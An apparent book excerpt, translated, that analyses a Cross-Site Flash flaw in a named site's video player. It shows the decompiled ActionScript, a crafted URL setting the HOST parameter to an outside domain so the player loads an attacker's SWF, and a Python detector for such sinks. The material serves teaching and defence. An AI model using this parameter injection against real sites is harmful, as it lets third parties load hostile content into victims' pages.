XSF stands for Cross-Site Flash.
Flash players on many websites may carry XSF risk, because these players need to load third-party Flash resources flexibly for playback. In practice this XSF risk is quite small, because when the browser accesses a Flash file directly, the Security Sandbox restrictions are very strict. So the nxtv Flash player analysed below only needs to be understood at the level of the concept: an XSF vulnerability of this kind has little value in such a scenario; what is valuable is the idea.
Vulnerable file: http://video.nxtv.cn/flashapp/player.swf
The analysis methods include static analysis and dynamic analysis.
1. Static Analysis
We can use the swfscan graphical tool or the swfdump command-line tool to decompile the file and obtain the ActionScript code. Both tools are good; swfscan is used as the example below.
Figure 6-5 shows the swfscan interface. In the Properties column we can see that this Flash file was written in AS2, and AS2 carries the risk of global variable overwriting. The most valuable part of swfscan for us is the Source column, which holds the decompiled source; its other functions are rarely needed. Reading through the decompiled source by eye, we find the following code.
Figure 6-5 swfscan page
var myXML = new XML();
// _root.HOST is never assigned inside the SWF; in AS2 such a global can be set from the URL query string
var _callResult_162 = myXML.load("http://" + _root.HOST + "/load.php?action=playerad");
myXML.ignoreWhite = true;
myXML.onLoad = function(success) {
    type = myXML.childNodes[0].childNodes[0].childNodes[0].nodeValue;
    adurl = myXML.childNodes[0].childNodes[1].childNodes[0].nodeValue;
    _global.sec = Number(myXML.childNodes[0].childNodes[2].childNodes[0].nodeValue);
    std = myXML.childNodes[0].childNodes[3].childNodes[0].nodeValue;
    if (std == 1) {
        if (type == 1) {
            // the SWF to play is built from the same global plus a value taken from the remote XML
            mp1.contentPath = "http://" + _root.HOST + "/" + adurl;
            var _callResult_267 = mp1.play();
        }
    }
};
First, the remote XML file is loaded. This approach is commonly used because XML is convenient, easy to use and highly configurable, and many of the subsequent functions use data from the XML file. If the XML file can be hijacked, many of the subsequent operations can be hijacked too.
The remote XML load can be hijacked through _root.HOST. In AS2, such global variables can be supplied directly through the URL, for example:
http://video.nxtv.cn/flashapp/player.swf?HOST=evilcos.me
The remote XML file is then:
http://evilcos.me/load.php?action=playerad
Its content is shown in Figure 6-6.
Figure 6-6 remote XML content
This XML has the same structure as the original, but we replace its content with values we construct ourselves, so that the contentPath used by mp1.play(), built as "http://" + _root.HOST + "/" + adurl, becomes:
http://evilcos.me/flash/video.swf
In this way a third-party Flash file is loaded and played, which is the XSF attack.
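As an added example (not code from the book or from the nxtv player), a small Python script that applies the static check above to decompiler output such as the swfscan source listing: it flags loader sinks (load, contentPath, loadMovie, getURL) whose URL is built from a _root/_global variable the SWF never assigns, or from a local filled with data parsed from a remote XML object. The sample input is the decompiled fragment above, re-typed; the sink and source name lists are my own assumptions about typical AS2 players.

```python
import re

# Constructed sample input: the decompiled AS2 fragment from the page, re-typed.
SAMPLE_AS2 = """\
var myXML = new XML();
var _callResult_162 = myXML.load("http://" + _root.HOST + "/load.php?action=playerad");
myXML.ignoreWhite = true;
myXML.onLoad = function(success) {
    type = myXML.childNodes[0].childNodes[0].childNodes[0].nodeValue;
    adurl = myXML.childNodes[0].childNodes[1].childNodes[0].nodeValue;
    _global.sec = Number(myXML.childNodes[0].childNodes[2].childNodes[0].nodeValue);
    std = myXML.childNodes[0].childNodes[3].childNodes[0].nodeValue;
    if (std == 1) {
        if (type == 1) {
            mp1.contentPath = "http://" + _root.HOST + "/" + adurl;
            var _callResult_267 = mp1.play();
        }
    }
};
"""

GLOBAL_REF = re.compile(r"\b(_root|_global)\.([A-Za-z_]\w*)")
GLOBAL_ASSIGN = re.compile(r"\b(_root|_global)\.([A-Za-z_]\w*)\s*=(?!=)")
XML_DECL = re.compile(r"\bvar\s+([A-Za-z_]\w*)\s*=\s*new\s+XML\s*\(")
XML_DATA = re.compile(r"\.(nodeValue|attributes|firstChild|lastChild|childNodes)\b")
LOCAL_ASSIGN = re.compile(r"(?:^|\s)(?:var\s+)?([A-Za-z_]\w*)\s*=(?!=)\s*(.+)")
SINK = re.compile(r"\.(load|sendAndLoad|loadMovie|contentPath|loadClip)\b|\b(loadMovie|loadMovieNum|getURL)\s*\(")

def find_xsf_candidates(source):
    """Return (line_no, sink_name, sources) for every loader sink fed by an unassigned global or by remote XML data."""
    lines = source.splitlines()
    # A global the SWF itself never assigns can be seeded from the URL query string in AS2.
    assigned = {f"{s}.{n}" for ln in lines for s, n in GLOBAL_ASSIGN.findall(ln)}
    xml_objects, tainted, findings = set(), set(), []
    for no, line in enumerate(lines, 1):
        xml_objects.update(XML_DECL.findall(line))
        m = LOCAL_ASSIGN.search(line)
        if m:
            target, rhs = m.groups()
            from_xml = XML_DATA.search(rhs) and any(re.search(rf"\b{x}\.", rhs) for x in xml_objects)
            if from_xml or any(re.search(rf"\b{t}\b", rhs) for t in tainted):
                tainted.add(target)  # this local now carries content of the remotely loaded XML
        sink = SINK.search(line)
        if not sink:
            continue
        sources = [f"{s}.{n}" for s, n in GLOBAL_REF.findall(line) if f"{s}.{n}" not in assigned]
        sources += [t for t in sorted(tainted) if re.search(rf"\b{t}\b", line)]
        if sources:
            findings.append((no, sink.group(1) or sink.group(2), sources))
    return findings
```

On the sample it reports the myXML.load() call and the mp1.contentPath assignment as reachable from _root.HOST (the latter also from adurl); assigning _root.HOST inside the SWF before use makes the first finding disappear.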
In practice, a complete analysis by eye in a purely static way is not easy. In many cases we also analyse dynamically; for example, the additional requests that appear in the Firebug Net panel in Firefox give a clearer picture of how the target Flash file actually runs.
2. Dynamic Analysis
The Firebug network data is shown in Figure 6-7.
Figure 6-7 Firebug network data
Note: when a third-party resource such as this XML file is loaded, the root directory of the third-party domain must contain a crossdomain.xml file that authorises the cross-origin request. If, however, a third-party Flash file is loaded directly, no crossdomain.xml authorisation is required.
This article is excerpted from "Web Front-end Hacker Technology Secrets"
by Zhong Chenming, edited by Xu Shaopei
Published by Electronic Industry Publishing House